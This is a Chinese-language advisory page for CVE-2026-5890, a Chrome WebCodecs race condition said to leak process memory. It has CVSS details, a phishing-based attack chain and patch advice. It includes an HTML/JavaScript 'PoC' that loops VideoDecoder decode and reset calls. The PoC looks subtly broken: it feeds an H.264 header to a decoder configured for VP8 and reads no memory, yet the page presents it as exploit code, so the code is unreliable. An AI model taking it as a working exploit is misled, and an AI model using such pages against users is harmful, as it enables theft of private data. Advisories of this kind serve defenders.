CVE-2026-5890 CVSS 5.3 中危

CVE-2026-5890 Google Chrome WebCodecs竞态条件信息泄露漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5890

漏洞类型

竞态条件

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome

漏洞概述

Google Chrome 147.0.7727.55之前版本存在中危漏洞。该漏洞源于WebCodecs组件中的竞态条件，允许远程攻击者通过诱导用户访问特制的HTML页面，从进程内存中获取潜在的敏感信息。此漏洞可能泄露用户隐私数据，攻击复杂度较高但无需认证，成功利用可导致高机密性影响，建议用户及时更新。

技术细节

该漏洞的核心在于Google Chrome浏览器WebCodecs API的实现过程中存在竞态条件。WebCodecs接口主要用于处理音频和视频的高性能编解码任务。在特定的多线程交互场景下，当解码器或编码器处理媒体数据流时，对共享内存缓冲区或状态变量的访问操作未进行充分的原子性锁定。攻击者可以构造一个精心设计的HTML页面，嵌入恶意的JavaScript脚本及特定的媒体文件。通过精确控制脚本执行时序或媒体流的解析节奏，攻击者能够在资源释放后与其被重新分配或回收之间制造一个极短的时间窗口。利用这个竞态窗口，攻击者可以越界读取进程内存中的数据，可能获取到敏感信息。利用该漏洞需要用户交互，攻击复杂度较高。

攻击链分析

STEP 1

准备阶段

攻击者准备包含特制HTML和JavaScript代码的网页，利用WebCodecs API的特定调用序列制造竞态条件。

STEP 2

投递阶段

攻击者通过网络钓鱼或其他社会工程学手段，诱导目标用户点击链接并访问该恶意网页。

STEP 3

执行阶段

用户在受影响的Chrome浏览器版本中打开网页，浏览器开始解析并执行其中的恶意代码。

STEP 4

利用阶段

代码触发WebCodecs组件中的竞态条件，在特定的时间窗口内读取进程内存数据。

STEP 5

达成目标

攻击者成功获取到进程内存中的敏感信息，可能导致用户隐私泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2026-5890 -->
<!-- Race condition in WebCodecs -->
<html>
<body>
<script>
async function trigger_race() {
    // Setup VideoDecoder
    const decoder = new VideoDecoder({
        output: (frame) => console.log("Frame output"),
        error: (e) => console.error(e)
    });

    // Create a malicious chunk to trigger the race
    const chunk = new EncodedVideoChunk({
        type: 'key',
        timestamp: 0,
        data: new Uint8Array([0x00, 0x00, 0x01, 0x67]) // Simplified header
    });

    decoder.configure({ codec: 'vp8' });
    
    // Loop to exploit race condition between decode and reset
    for(let i=0; i<100; i++) {
        try {
            decoder.decode(chunk);
            decoder.reset(); // Reset might trigger the race with pending decode
        } catch(e) {
            // Ignore errors
        }
    }
    
    decoder.close();
}

trigger_race();
</script>
</body>
</html>

影响范围

Google Chrome < 147.0.7727.55

防御指南

临时缓解措施

目前最有效的缓解措施是立即更新Google Chrome浏览器至最新版本。在无法立即更新的情况下，用户应限制对不可信网站的访问，并避免在处理敏感信息时使用未知来源的浏览器扩展或插件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表